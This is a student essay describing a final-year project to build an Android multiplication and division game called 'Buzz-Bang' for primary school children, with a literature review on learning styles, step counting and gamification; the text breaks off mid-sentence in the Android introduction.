limited enough to be used outside of a POE environment. They know nothing of POE or of the running POE environment. The standard interface requires three methods: new(), the constructor; get(), the input parser; and put() the output generator. get() takes a stream of data and returns parsed records, which may be hashes, arrays, objects, or anything else one might desire. put() takes user generated records and converts them to raw data. Design With these four simple building blocks, POE applications can grow to meet almost any need while still being maintainable. The key is to break the application up into small chunks. This is beneficial for two main reasons: 1) the individual chunks are more easily understood by a new staff member or someone else looking at the code six months from now. 2) Smaller blocks of code spend less time ... well, blocking.. Even long-running for-loops can be broken down into small POE events. while(@data) { # ... process, process } can become $poe_kernel->yield('process_data' => $_) for @data; This gives POE time to read from sockets, do internal housekeeping, and so on,between each bit of processing time. If @data is large enough, however, this method can lead to resource depletion - spewing out 5000 events to process @data may get the job done and allow POE to do housekeeping, but it means that for the next 5000 event invocations, POE is doing nothing but processing that array. POE's event queue is a FIFO (First In First Out). Events are processed in the order they are invoked. There are two major exceptions to this. Signals can trigger immediate event processing, and using call() instead of yield() or post() will cause immediate event processing. Beyond those two exceptions, every event happens in order, all of the time. In the example above, we asked POE to push a large number of events on the queue. While POE can still read off whatever socket we're getting data from inbetween those yields, the events triggered by that socket read will not be invoked until after we're done processing our giant array. We can break that pattern out very easily. If we don't need to process @data in any timely fashion, we can stagger the processing out further: $poe_kernel->delay_add('process_data' => $hence++ => $_) for @data; This will process one chunk of @data every second. Not very efficient or timely but other events can take place between invocations. One second is by no means the smallest time value accepted by delay_add(). Use of Time::HiRes allows for microsecond delay values: use Time::HiRes; use POE; The use of Time::HiRes before importing POE causes POE to use Time::HiRes' time() instead of perl's built-in time(). While Time::HiRes has much greater resolution on time values, it may or may not be the most accurate time keeper on your particular platform. Do your homework and make the choice that best suits your situation and needs. Conclusion POE is a flexible application framework appropriate for long-running large-scale perl applications. It provides standard interfaces for task abstraction and forces the coder to think about their software in smaller, more maintainable chunks. POE is available on CPAN () and has a rich, community-maintained website ().
http://www.perl.com/pub/2004/07/02/poeintro.html
CC-MAIN-2016-30
refinedweb
1,433
55.74
Section 7.2 Failures Let us consider a program \(s\) and a specification \((P,Q)\text{.}\) If \(s\) is not partially correct with respect to \((P,Q)\) the program has an error. Then, due to Definition 7.1.8, there exists a state \(\sigma\models P\) such that \(\config s\sigma\) has one of the following outcomes: \(\config s\sigma\) gets stuck. \(\config s\sigma\) aborts. \(\config s\sigma\) terminates properly in a state \(\sigma'\) but \(\sigma'\not\models Q\text{.}\) Definition 7.2.1. Failure. A state \(\sigma\) is called a failure with respect to \(s\) and \((P,Q)\) if one of the three cases is true. Remark 7.2.2. If \(s\) gets stuck, the semantics of the machine program that the compiler created for \(p\) is undefined. In that case, this machine program can either (a) diverge, (b) abort, or terminate properly in a state that either (c) satisfies or (d) does not satisfy the post condition. This means that, in the case of undefined behavior, we might not be able to observe a failure! This is the case in (a) and (c). So, when testing or debugging programs it is very helpful to avoid getting stuck (i.e. running into undefined behavior). This can be achieved by using sanitizers which instrument the C program to detect undefined behavior during execution and cause the program to abort in such cases. Remark 7.2.3. If a program is partially but not totally correct, there is an input that satisfies the precondition but causes the program to diverge. That means that if the program is free of failures, we can only conclude that it is partially correct. A failure is a witness for an error. In general however, failures do not inform us about the cause of the error, i.e. the part of the program that is erroneous. A failure is therefore a symptom not a diagnosis. Let us consider the following example: unsigned min(unsigned x, unsigned y) { if (x < y) return y; else return x; } unsigned sum_first_n(unsigned *arr, unsigned sz, unsigned n) { unsigned sum = 0; n = min(n, sz); for (unsigned i = 0; i < n; i++) sum += arr[i]; return sum; } Assume that the specification is given, as usual in practice, in plain English: The function sum_first_nshall sum up the first n, however at most sz, elements of the array arr. Let us consider the following calls to sum_first_n: int main() { unsigned arr[] = { 1, 2, 3 }; unsigned r1 = sum_first_n(arr, 3, 2); // (1) unsigned r2 = sum_first_n(arr, 3, 3); // (2) unsigned r3 = sum_first_n(arr, 3, 4); // (3) The first call is a failure because our specification demands that the result r1must be 3, it is however 6. is not a failure. causes the program to get stuck. The last iteration of the loop in sum_first_nindents to access the array element arr + 3which does not exist and therefore the address arr + 3is not valid. We discussed before 7.2.2 that we cannot make any assumptions on the program's behavior in this case. The cause for the failure in (1) and the getting stuck in (3) is an error (also called defect or bug) in the function min: min does not compute the minimum but the maximum. This examples shows that a failure may tell us little about the cause of the error that failure exposes. In practice, it can be especially hard to localize the error in program code. The first input merely results in a wrong result whereas the third causes undefined behavior which can be hard to observe (see Remark 7.2.2). Finding errors in programs can be significantly simplified if programs fail as early as possible when they enter an erroneous state. Then, the program won't continue executing with “wrong” values and thereby dislocating the cause from the symptom. A very common way to achieve this is to use assertions in the code to assert invariants, i.e. conditions on the program state at a particular program point that have to hold for every input. These assertions can then be checked at runtime and if they are violated, the program can be aborted immediately. Definition 7.2.4. assert(). We define the function \(\CAssert e\) as \(\CIf{e}{\CBlock{}}{\CAbort}\text{.}\) In C, assertions are typically implemented as macros that are expanded to an if-then-else construct as in Definition 7.2.4. When defining the macro NDEBUG (typically by given the command line switch -DNDEBUG) asserts can be deactivated by defining the macro assert to the empty text. This is typically done for production code that has been “sufficiently” tested. Example 7.2.5. Assertions in the Minimum Program. #include <assert.h> unsigned min(unsigned x, unsigned y) { unsigned m = x < y ? x : y; assert(m <= x && m <= y && (m == x || m == y)); return m; } assert evaluates the argument expression. If the resulting value is 0, then the execution aborts immediately. Hence, the program aborts very close to the error location. In general, it is advisable to document as much invariants as possible using assertions. They come for free in terms of runtime in the production code because they can just be disabled. They can help to expose bugs and can make it easier to fix them. And they are also helpful for documentation purposes because the denote (at least a part) of the invariant that the programmer had in mind for the particular program point. This holds especially for pre- and postconditions. Note however that the C expression language is often not strong enough to formulate powerful invariants because it does not contain quantifiers like the assertion language wi have defined in Definition 7.1.2 (they would of course be very hard to check at runtime). Therefore, often only a part of the invariant can be documented in an assertion. Let us consider the following example where we can use assertions productively to specify the precondition. Which in this case is that the array is non empty: Example 7.2.6. Consider a function that is supposed find the minimum of all elements of an array. This operation is not well defined on empty arrays. So it should not be possible to call the function with an empty array. We document this by the assertion assert(n > 0);. In debug builds, this assertion is checked during runtime and readers of the code will see that the precondition is that we don't pass empty arrays. unsigned min_arr(unsigned* arr, unsigned n) { assert(n > 0); unsigned res = arr[0]; for (unsigned i = 1; i < n; i++) res = min(res, arr[i]); return res; } Note that checking the assertion in debug builds has a concrete benefit: If we accessed the first element of an empty array, the behavior of the program would be undefined with all the consequences outlined in Remark 7.2.2. Checking the assertion at runtime however directly aborts the program in this situation and the failure we get from that brings us closer to the error location. Remark 7.2.7. Defensive Programming. Programming defensively means that one does not only consider the happy path, that is the simplest situation in which a piece of code is supposed to work in which no exceptional or erroneous situations occur. Defensive programming means that one considers all possible inputs also those that violate the precondition. This essentially means that one carefully makes sure that all preconditions are met. Often, this is misunderstood to mean that the code should not abort in any case, i.e. that it is best, if the precondition is \(\ltrue\text{.}\) Some programmers try to make this happen by “inventing” default values that are returned in the error case. In principle, it is a design choice where errors shall be handled. Consider the following example code. The function min_idx shall return the index of a smallest elements in an array. Of course, the function is not defined on empty arrays, because they don't have a minimum. The programmer could indicate the error situation by returning \(-1\) or something similar: int min_arr(int* arr, unsigned n) { if (n == 0) return -1; int min = arr[0]; int idx = 0; for (unsigned i = 1; i < n; i++) { if (arr[i] < min) { min = arr[i]; idx = i; } } return idx; } Here, returning \(-1\) does not really help. That \(-1\) is not the minimum of the array. Instead of checking for the result being \(-1\) after calling min_arr, the programmer could have checked for the length of the array being greater than \(0\) equally well. There is nothing gained from making min_arr “work” on all inputs. On the contrary, there is the risk of moving a possible error further away from the failure. Here, it would be best to just start min_arr with an assertion: int min_arr(int* arr, unsigned n) { assert (n > 0); ... }
https://prog2.de/book/sec-corr-failures.html
CC-MAIN-2022-33
refinedweb
1,479
61.67
Hi. I would like to use conky to display EPG on me desktop. I found a cool website: and the owner, Mahzan Musa was very kind to provide his code. THANK YOU Unfortunately his html epg source is completely different from mine and the code was not so easy to understand for a 1st starter. After a week of reading and googling I was able to make my first python code: import urllib texto = urllib.urlopen('').read() index = texto.find('<td class="topaligned "><div class="withmargin nowrap"') h1 = index+55 index = texto[h1:].find('><span class="title">') pi1 = h1 + index + 21 index = texto[pi1:].find('</span><br') pf1 = pi1 + index index = texto[pf1:].find('<td class="topaligned "><div class="withmargin nowrap"') h2 = pf1+index+55 index = texto[h2:].find('><span class="title">') pi2 = h2 + index + 21 index = texto[pi2:].find('</span><br') pf2 = pi2 + index print texto[h1:h1+19]+' '+texto[pi1:pf1]+'\n'+texto[h2:h2+19]+' '+texto[pi2:pf2] this is the output 08:00 PM - 08:30 PM As Princesas GÚmeas do Planeta Maravilha T.1 Ep.2 08:30 PM - 09:00 PM As Princesas GÚmeas do Planeta Maravilha T.1 Ep.3 It reads the html and print the 1st 2 shows, time and name. It's what I was looking for, now I can display this info with conky. Now, I have a problem, I want more the one channel( 120 in the url on my code). I could copy paste and change the channel number and save n copies of it, but it's not the best option. I would like to use a argument when running the py, like python epg.py channel number . What do I have to change/implement to achieve this?
https://www.daniweb.com/programming/software-development/threads/273944/how-to-run-a-py-with-a-s
CC-MAIN-2018-43
refinedweb
292
75.71
CodePlexProject Hosting for Open Source Software I am building a module, which will have an apiController with 2 functions: get userid - return a list of ints (list of favorite pages ids) get user id + page id - save to DB I created this record: using System; using System.Collections.Generic; using System.Linq; using System.Web; using Orchard.ContentManagement.Records; namespace YIT.FavoriteArticles.Models { public class UserFavoriteArticleRecord : ContentPartRecord { public virtual int userId { get; set; } public virtual int articleId { get; set; } } } My problem is that in order to create a migration i need this record to be a content part, which means that in order to create instances of this record, i need to associate the content parts to a page. How can I build this controller with a migration or just connect it to a table I created in the database without the record instances appearing in the admin gui? Thanks :) Why did you derive from ContentPartRecord? All you need is an Id column. if I don't derive from contentpartRecord, AND create a migration with codegen, how would a be able to create record instances (and save in DB) with my apiController? And how would I be able to get records based on the userId? If you have an Id properly defined, it will get mapped, and you can inject an IRepository<T> to manipulate the table. When I use the Create method of Irepository, do I need to give an id to the record I'm passing it? or does it generate the id? for example, is this good enough? public HttpResponseMessage AttachArticleToUser(int userId, int articleId) { try { UserFavoriteArticleRecord record = new UserFavoriteArticleRecord(); record.articleId = articleId; record.userId = userId; _repository.Create(record); return Request.CreateResponse(HttpStatusCode.OK, "1"); } catch (Exception ex) { return Request.CreateResponse(HttpStatusCode.NotAcceptable, ex.Message); } } And another question, do I need to add something to the migration automatically created for the module by code genartion? It does generate it. Your migration should set-up the Id column something like this: Column<int>("Id", column => column.PrimaryKey().NotNull()); Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://orchard.codeplex.com/discussions/405383
CC-MAIN-2017-04
refinedweb
376
58.38
SYNOPSIS #include <fmtmsg.h> int addseverity(int severity, const char *s); Feature Test Macro Requirements for glibc (see feature_test_macros(7)): addseverity(): Since glibc 2.19: _DEFAULT_SOURCE Glibc 2.19 and earlier: _SVID_SOURCE DESCRIPTIONThis function allows the introduction of new severity classes which can be addressed by the severity argument of the fmtmsg(3) function. By default, that function knows only how to print messages for severity 0-4 (with strings (none), HALT, ERROR, WARNING, INFO). This call attaches the given string s to the given value severity. If s is NULL, the severity class with the numeric value severity is removed. It is not possible to overwrite or remove one of the default severity classes. The severity value must be nonnegative. RETURN VALUEUpon success, the value MM_OK is returned. Upon error, the return value is MM_NOTOK. Possible errors include: out of memory, attempt to remove a nonexistent or default severity class. VERSIONSaddseverity() is provided in glibc since version 2.1. ATTRIBUTESFor an explanation of the terms used in this section, see attributes(7). CONFORMING TOThis function is not specified in the X/Open Portability Guide although the fmtmsg(3) function is. It is available on System V systems. NOTESNew severity classes can also be added by setting the environment variable SEV_LEVEL. COLOPHONThis page is part of release 4.06 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at.
http://manpages.org/addseverity/3
CC-MAIN-2019-35
refinedweb
245
51.24
Opened 17 months ago Closed 17 months ago Last modified 17 months ago #22126 closed Bug (duplicate) Unicode error using GeoIP `country_name()` method Description The method country_name() located at django.contrib.gis.geoip.GeoIP returns a str instead of unicode string and fails when the name contains non ASCII chars. The error I'm getting is: 'utf8' codec can't decode byte 0xe7 in position 170: invalid continuation byte. The string that could not be encoded/decoded was: 'Cura�ao' To reproduce it do a lookup with: from django.contrib.gis.geoip import GeoIP GeoIP().country_name('190.185.103.13') If instead of using the method country_name() we use city() the returned info is different (inconsistency?): {'city': u'Neuquen', 'continent_code': u'SA', 'region': u'15', 'charset': 0, 'area_code': 0, 'longitude': -68.05909729003906, 'country_code3': u'ARG', 'latitude': -38.95159912109375, 'postal_code': None, 'dma_code': 0, 'country_code': u'AR', 'country_name': u'Argentina'} Change History (4) comment:1 Changed 17 months ago by erikr - Cc eromijn@… added - Needs documentation unset - Needs tests unset - Owner changed from nobody to erikr - Patch needs improvement unset - Status changed from new to assigned comment:2 Changed 17 months ago by erikr - Resolution set to duplicate - Status changed from assigned to closed - Triage Stage changed from Unreviewed to Accepted comment:3 follow-up: ↓ 4 Changed 17 months ago by caumons Will this be backported to v 1.5? And... what about the country inconsistency calling country_name() and city()? Is this somehow related to the encoding error? comment:4 in reply to: ↑ 3 Changed 17 months ago by claudep Will this be backported to v 1.5? No, 1.5 is in security-only fix mode. And... what about the country inconsistency calling country_name() and city()? Is this somehow related to the encoding error? I doubt this is a problem in Django, and I'm unable to reproduce it on my system. g.country_name('190.185.103.13') u'Argentina' This is a duplicate of #21996, which was fixed in 1.7 and backported to 1.6.
https://code.djangoproject.com/ticket/22126
CC-MAIN-2015-32
refinedweb
336
54.93
Docs | Forums | Lists | Bugs | Planet | Store | GMN | Get Gentoo! Not eligible to see or edit group visibility for this bug. View Bug Activity | Format For Printing | XML | Clone This Bug the pygobject testsuite fails if pygtk isn't installed: make[2]: Entering directory `/var/tmp/portage/dev-python/pygobject-2.14.0/work/pygobject-2.14.0/tests' Traceback (most recent call last): File "./runtests.py", line 42, in <module> suite.addTest(loader.loadTestsFromName(name)) File "/usr/lib64/python2.5/unittest.py", line 533, in loadTestsFromName module = __import__('.'.join(parts_copy)) File "../tests/test_subtype.py", line 9, in <module> import gtk ImportError: No module named gtk make[2]: *** [check-local] Error 1 unfortunately pygtk RDEPENDs on pygobject, creating a circular dependency. because of this, it might be best to add RESTRICT=test to the pygobject ebuild. Hmm... That's a very very hard one. Gnome team: maybe patch out any tests needing pygtk? Or block tests all together? In general, a new system should probably not be installed with FEATURES=test, but that's not a real solution. I had this issue while upgrading to python-2.5 and running /usr/sbin/python-updater. pygobject bailed out with same error. Solved this by manually running: # FEATURES="-test" emerge -1 pygobject && emerge -1 pygtk && emerge -1 pygobject What about making pygobject DEPEND="test? ( dev-python/pygtk )"? This would introduce a circular dependency, which needs to be resolved the way described above. BR, Dustin *** Bug 228497 has been marked as a duplicate of this bug. *** *** Bug 231412 has been marked as a duplicate of this bug. *** *** Bug 217349 has been marked as a duplicate of this bug. *** If no one wants to fix this, I'll be adding RESTRICT=test to pygobject. Why not add the DEPEND mentioned in comment #2? Plus a message on how to resolve the circular dependency. Because a circular dependency happens when the package manager is building a dependency graph, before the list of packages to build is displayed, and before any particular package can display a message. *** Bug 233362 has been marked as a duplicate of this bug. *** For the record, the latest versions pygtk and pygobject should be fixed as the codegen tool needed for the tests has been moved to pygobject. So basically, the circular dep is gone. Hopefully, we should get those versions into portage along with Gnome 2.24. Keeping this bug open until it's in portage. Thanks I was sick of this test suite failing in my chroot for arch testing so I added RESTRICT="test" to pygobject-2.14.2 as a simple workaround. Hope no one screams too loudly ;) (In reply to comment #10) > For the record, the latest versions pygtk and pygobject should be fixed as the > codegen tool needed for the tests has been moved to pygobject. So basically, > the circular dep is gone. > I'm not sure what version "the latest" is, but I still see this with pygobject 2.15.4. Is this fixed with a newer version, or should it have been fixed in this version?
http://bugs.gentoo.org/199725
crawl-002
refinedweb
512
67.04
Hi I'm stuck on this very simple programme. The user is prompted to enter an equation and, if it is not in the format x + y = z I would like it to output an error message. However, if someone typed in 2 + 3 = 3 + 2, the addition 3 + 2 is automatically done and the value of 5 goes into z. If anyone can help me, I'm very confused! Thanks! Code:#include <iostream> #include <string> using namespace std; int main () { cout << "Please enter an equation."<<endl; int x, y, result; string sign, equals; cin >> x >> sign >> y >> equals >> result; if ((cin.fail ()) || (sign != "+") && (sign != "-")) {cout << "Invalid Input"; return 1;} bool plus = false; if (sign == "+") plus = true; //check for addition/minus { if (plus) {if (x+y == result) cout << "Correct1"; else cout << "Incorrect1"; } else {if (x-y == result) cout << "Correct2"; else cout << "Incorrect2"; } }
https://cboard.cprogramming.com/cplusplus-programming/58145-beginner-trouble.html
CC-MAIN-2017-26
refinedweb
142
69.01
Programmer's Reference Guide CAPTCHA Adapters The following adapters are shipped with Zend Framework by default. Zend_Captcha_Word Zend_Captcha_Word is an abstract adapter that serves as the base class for most other CAPTCHA adapters. It provides mutators for specifying word length, session TTL, the session namespace object to use, and the session namespace class to use for persistence if you do not wish to use Zend_Session_Namespace. Zend_Captcha_Word encapsulates validation logic. By default, the word length is 8 characters, the session timeout is 5 minutes, and Zend_Session_Namespace is used for persistence (using the namespace "Zend_Form_Captcha_<captcha ID>"). In addition to the methods required by the Zend_Captcha_Adapter interface, Zend_Captcha_Word exposes the following methods: setWordLen($length)and getWordLen()allow you to specify the length of the generated "word" in characters, and to retrieve the current value. setTimeout($ttl)and getTimeout()allow you to specify the time-to-live of the session token, and to retrieve the current value. $ttlshould be specified in seconds. setSessionClass($class)and getSessionClass()allow you to specify an alternate Zend_Session_Namespace implementation to use to persist the CAPTCHA token and to retrieve the current value. getId()allows you to retrieve the current token identifier. getWord()allows you to retrieve the generated word to use with the CAPTCHA. It will generate the word for you if none has been generated yet. setSession(Zend_Session_Namespace $session)allows you to specify a session object to use for persisting the CAPTCHA token. getSession()allows you to retrieve the current session object. All word CAPTCHAs allow you to pass an array of options to the constructor, or, alternately, pass them to setOptions(). You can also pass a Zend_Config object to setConfig(). By default, the wordLen, timeout, and sessionClass keys may all be used. Each concrete implementation may define additional keys or utilize the options in other ways. Note: Zend_Captcha_Word is an abstract class and may not be instantiated directly. Zend_Captcha_Dumb The Zend_Captch_Dumb adapter is mostly self-descriptive. It provides a random string that must be typed in reverse to validate. As such, it's not a good CAPTCHA solution and should only be used for testing. It extends Zend_Captcha_Word. Zend_Captcha_Figlet The Zend_Captcha_Figlet adapter utilizes Zend_Text_Figlet to present a figlet to the user. Options passed to the constructor will also be passed to the Zend_Text_Figlet object. See the Zend_Text_Figletdocumentation for details on what configuration options are available. Zend_Captcha_Image The Zend_Captcha_Image adapter takes the generated word and renders it as an image, performing various skewing permutations to make it difficult to automatically decipher. It requires the » GD extension compiled with TrueType or Freetype support. Currently, the Zend_Captcha_Image adapter can only generate PNG images. Zend_Captcha_Image extends Zend_Captcha_Word, and additionally exposes the following methods: setExpiration($expiration)and getExpiration()allow you to specify a maximum lifetime the CAPTCHA image may reside on the filesystem. This is typically a longer than the session lifetime. Garbage collection is run periodically each time the CAPTCHA object is invoked, deleting all images that have expired. Expiration values should be specified in seconds. setGcFreq($gcFreq)and getGcFreg()allow you to specify how frequently garbage collection should run. Garbage collection will run every 1/$gcFreqcalls. The default is 100. setFont($font)and getFont()allow you to specify the font you will use. $fontshould be a fully qualified path to the font file. This value is required; the CAPTCHA will throw an exception during generation if the font file has not been specified. setFontSize($fsize)and getFontSize()allow you to specify the font size in pixels for generating the CAPTCHA. The default is 24px. setHeight($height)and getHeight()allow you to specify the height in pixels of the generated CAPTCHA image. The default is 50px. setWidth($width)and getWidth()allow you to specify the width in pixels of the generated CAPTCHA image. The default is 200px. setImgDir($imgDir)and getImgDir()allow you to specify the directory for storing CAPTCHA images. The default is "./images/captcha/", relative to the bootstrap script. setImgUrl($imgUrl)and getImgUrl()allow you to specify the relative path to a CAPTCHA image to use for HTML markup. The default is "/images/captcha/". setSuffix($suffix)and getSuffix()allow you to specify the filename suffix for the CAPTCHA image. The default is ".png". Note: changing this value will not change the type of the generated image. All of the above options may be passed to the constructor by simply removing the 'set' method prefix and casting the initial letter to lowercase: "suffix", "height", "imgUrl", etc. Zend_Captcha_ReCaptcha The Zend_Captcha_ReCaptcha adapter uses Zend_Serviceend_Service_ReCaptcha $service)and getService()allow you to set and get the ReCaptcha service object. blog comments powered by Disqus
http://framework.zend.com/manual/1.8/en/zend.captcha.adapters.html
crawl-003
refinedweb
761
50.12
Teach Me Maths Android Application Computer Science Essay Published: Last Edited: This essay has been submitted by a student. This is not an example of the work written by our professional essay writers. The aim of this project is to develop a mobile application to support learning of multiplication/division among Primary school children.The application will be focused on Multiplication and Division. I hope to use research into Learning Styles and Cognitive Styles to design an interactive Application which will help improve children's numeracy skills and support the cognitive processes of children. Cognition describes an individual's typical or habitual mode of problem solving, thinking, perceiving and remembering (Cassidy, 2004). The application will target at 3rd and 4th class children and will be developed for the Android platform. A scenario where this application could be useful would be on a car journey. Parents are driving a car with children in the backseat. Instead of the children being bored during the journey or playing some video games, the parents can give the kids their phones to use the app. This way the parents will be happy that their children are learning for the duration of the journey. The children will also benefit from this as they will be improving their numeracy skills I also believe that this project could be useful in the school environment. Teachers will be able to give their students homework through the app and monitor student progress through from their scores. 1.2 Concept of the Application The name of the Application will be 'Buzz-Bang'. It will use Cognitive methods combined with Gamification to provide an interactive educational experience to the user. The game should help develop the 'step-counting' technique for multiplication. In the game, the user will be shown three numbers: A, B, and C. The user will have to perform two calculations in order to determine the correct answer. There are three possible answers for the user to choose from: 'Buzz', 'Bang', and Buzz-Bang'. If A is a multiple of C, the user should push the 'Buzz' button. If B is a multiple of C, the user should push the 'Bang' button. If both A and B are multiples of C, then the user should push the 'BuzzBang' button. In the test section of the game, the users score will be calculated throughout the round and presented to them at the end of the round, along with their high score and their average score. No help will be available to the user in this section. The game will also have a practice section which allows the user to play the game without having his/her score recorded. The user will have access to help in this section relating to the question they are on. If the user answers a question incorrectly then they will be shown the help section before attempting the question again. The game will have different levels of difficulty. In the beginners level, the user will have to calculate multiples of 1, 2, 5 and 10. In the intermediate level, users will have calculate multiples of 1, 2, 3, 4, 5, 6 and 10. In the advanced level, users will have to calculate multiples of all numbers from 1-12. Users should be able to achieve high scores at one level before moving on to the next level. Users will be able to keep track of their overall stats and progress in the user profile section of the application. 1.3 Technologies used in the project In order to develop my Android application I will have to utilize a number of different technologies. An important part of my project was to understand and implement these technologies correctly. All Android applications are developed in the Java programming language. XML files are used to define the structure of the User Interface. I will develop my application using the Eclipse IDE along with the ADT (Android development tools) plug-in. This plug-in extends the normal allows android projects to be created in the Eclipse environment. Since my application will require users' data to be stored, the android device will have to communicate with a remote server, sending and receiving user data over the internet. This means that several more technologies will be used in the development of my application. I will use a WAMP server to store the required data. WAMP(Windows, Apache, MySQL, PHP) provides an environment for developing projects using MySQL and PHP. For my application I will store user details in a MySQL database. Since Android devices cannot connect to MySQL databases directly, I will write PHP classes which connect to the database, retrieve information from the database, and update the database when required. The data will be transferred from the database to the Android device in JSON format. JSON is a format for storing and transferring text information. In order to connect to the database my application will send a request to PHP class. The PHP class will carry out the required operation and return data to the application. 1.4 Methodology I used the following methodology while carrying out research for the project. The first step was to identify the relevant reading resources. For this I searched Google scholar, which allows you to search for scholarly literature from many sources. The University of Limerick library and CAL (Computer aided Learning) also provided me with some useful articles. Once I had identified the relevant material I began my literature review. For each article I wrote a brief introduction of the article, wrote a summary of the key findings from the article, and concluded how these findings could be useful for my FYP, Since I had no experience developing for the android platform, I began a series of tutorials which gave me a good introduction to the development process. The tutorials were from the website '' who give free educational tutorials on a wide range of topics. While these tutorials were useful, I also used other sources to develop my Android application development skills such as '' and '. The book 'Beginning Android' by Grant Allen was also a good source of material for me. Once I felt comfortable with Android development, I focused on the design and implementation of my application. This will be discussed further in chapter three of this report. 1.5 Objectives of my FYP There are a number of objectives that I wish to achieve in my final year project. I hope to gain an understanding of different learning styles and cognitive models that can affect a child's development. I also hope to research the different challenges that face children who are learning mathematics. I will use this research to design an application which supports these education techniques. I hope to develop a better understanding of the Android development environment. Since Android development is centred on the Java programming language, I hope implement what I have learned about Java in university, in my FYP. I have no previous experience of Android development so this will be a excellent opportunity to learn a new skill which is becoming more and more important as smartphones grow more popular. I will learn about relational database management system (RDBMS) techniques, and use technologies such as MySQL, WAMP, JSON and PHP to utilise RDBMS in my Application. I will evaluate number of applications which are already on the market using relevant guidelines. By evaluating these applications I will be able to design a better application myself. I will take the positive features of the existing applications and try to implement some of them while avoiding the negative aspects of the applications. I will carry out research into the benefits of gamificaiton of education. There is a lot of research going on in this at the moment. If I feel that gamifying the application will help with cognitive learning then I will include it in my application. I hope to implement all of the findings of my research in the Android Application. The design should succeed in meeting the cognitive needs of children. 1.6 Overview of my report This report contains details my Final Year Project. Chapter 1 gives a brief introduction to the Project outlining the Projects concept, Requirements, and Objectives. Chapter 2 will contain details of the research carried out into Learning styles, Cognitive Learning, the difficulties learning Mathematics, Gamification, and Android development. In Chapter 3, I will discuss the Design and implementation of my Application. In Chapter 4, I will evaluate the finished application. Finally in chapter 5, I will discuss possible future work which could be carried out on my project, as well as giving a summary of my achievements in the project. Chapter 2 2.1 Introduction In the following chapter I will discuss the key findings of my research. I identified several topics which were relevant to my project, and found numerous articles based on these. The main subjects I was interested in were learning Styles/cognition, mathematics, gamificaiton and Android development, 2.2 Learning Style/Cognition Since my Android application will be aimed at supporting children's educational needs, I wanted to find out about different learning styles and how these can impact a child's progress in education. Somebody's learning style is the way that he/she chooses to approach a learning situation. This has an impact on his/her performance while learning and also impacts the outcome of the learning. There are a number of important concepts in the field which need to be understood. A person's cognitive style is a person's natural style of problem solving, thinking, and remembering. A person's learning style describes how a person can apply their cognitive style to a learning situation. A person can adopt different learning strategies to deal with different types of tasks. Cognitive styles are seen as being more automatic and natural than learning styles. Learning preferences are defined as favouring one method of teaching over another (such as group work over independent-work). There are two main theories about the cognitive processes involved in children's mathematical learning. The First theory stresses the importance of the numerical procedures that children have to learn at the start of their mathematical career at school without referencing their understanding of quantities or relations. However there is evidence that shows children cannot use these procedures without fully understanding their connection with quantities. This shows that learning about numbers themselves is not sufficient for learning mathematics. The second theory focuses on the importance of children's reasoning about quantities and relations for mathematical learning, and assigns numerical procedures to a secondary role. I wanted to see how these concepts could be applied to children learning mathematics. Children's success in learning mathematics varies a great deal from child to child. We must consider what underlying skills determine how well children do in mathematics. For example, can a child take in and remember mathematical information well, calculate efficiently, and reason logically. Finding answers to these questions should allow better systems for teaching mathematics to be devised. Learning Mathematics in Primary school involves learning about numbers, quantities and relations, and about the connections and distinctions between these concepts. Quantities and numbers are not the same. A quantity can be represented by a number but we do not always need to measure a quantity to represent it by a number. Relations have a converse (greater than/less than/etc...). In order to learn Mathematics, children must be able to coordinate their understanding of quantities with their understanding of relations, and must also be able to distinguish between them. Children can only truly understand the meaning of numbers only when they understand, for example that all sets with the same number of objects are equivalent, and if two sets are equivalent they necessarily have the same number of objects. They also need to understand that you only change the number in a set if you add or subtract elements. Studies(Nunes, Byrant, Sylva and Barnes(2009)) have shown that the relation between mathematical reasoning and mathematical achievement is evidence that children need to spend time learning what quantitative relations are and how to reason about them logically and enterprisingly. Children's ability to both calculate and to reason about mathematical relations when they were 7/8 years old played a key role in their mathematical achievement over the next 5 years, and that the contribution made by the children's ability to reason mathematically was far greater than the contribution made by the children's ability to calculate. 2.3 Step Counting One method which is being used to teach multiplication is known a 'step-counting'. This is the favoured method of the 'Project-Maths' curriculum for teaching multiplication to children. From emails with 'Project-Maths' I learned that students going into secondary school are not as comfortable with step-counting as they should be. In 'step counting' a multiplication sum is worked out by counting up in steps. For the sum (5*6), the answer is found by counting 6…12…18…24…30. 'Step-counting' is a good technique to use when teaching as, usually error in multiplication stems from mistakes made in written calculation. These mistakes are normally caused by following an incorrect or faulty procedure. Even if a student is following an incorrect method they will assume that the answer they get is correct. However if a student works through the sum with step-counting he is more likely to have got the correct answer. Using this technique will give children a deeper knowledge of multiplication, and an awareness of modifications that they could make to number in a calculation which would still give them the same result. They will understand that (3 + 1 + 1+1) is the same as (3*2). Children will also be able to work out more complex problems by splitting them up into smaller problems. Initially children should be able to derive multiples of 2, 5, and 10. Once they are comfortable with this they should be moved onto multiplication facts for 2, 3, 4, 5, and 6. After this stage they progress onto higher numbers. 2.4 Gamification In recent years the potential of using Gaming in education has become a much discussed topic. Gamification is the incorporation of game elements into non-game settings. Gamification in education can help solve problems with student motivation and engagement. In education, it attempts to use the motivational power of games to improve student motivation and engagement. Something about the typical learning environment fails to engage students. Video Games and virtual worlds excel at engagement. Lessons are not usually regarded as playful experiences. In order to understand the potential of Gamification, we need to consider how its techniques can be deployed in practice effectively. There are two major areas where gamificaiton can be useful: Cognitive: Games guide players through a process and keep them engaged with potentially difficult tasks. 'One critical game design technique is to deliver concrete challenges that are perfectly tailored to the player's skill level, increasing the difficulty as the player's skill expands. Specific, moderately difficult, immediate goals are motivating for learners, and these are precisely the sort that games. In the best designed games, the reward for solving a problem is a harder problem. This supports motivation and engagement. These techniques can transform student perspectives on learning. Emotional: Games can provide positive emotional experiences such as optimism and pride. Games can also help players persist through negative experiences and turn negative experiences into positive. Games often involve failure and may require the player to fail multiple times, learning something each time. Games allow players to keep trying until they succeed, and to risk very little by doing so. With traditional learning, the stakes of failure feel much higher and cause students anxiety. Games offer them a feeling of anticipation when given the chance to fail/overcome failure. Games portray failure as a necessary part of learning, and create an environment where effort is rewarded. Risks and Benefits Gamification can motivate students and get them to apply themselves fully in learning environments. It can show students that education can be a more informal, enjoyable experience. Since Games have clear objectives and give instant feedback to the player, players can change how they play in order to improve and reach the objectives. This also applies to students who will improve their work when given constructive feedback. 2.5 Introduction to Android Android is an operating system for mobile phones based on the Linux platform. It delivers a complete set of software for mobile devices, an operating system, middleware, and key mobile applications. It 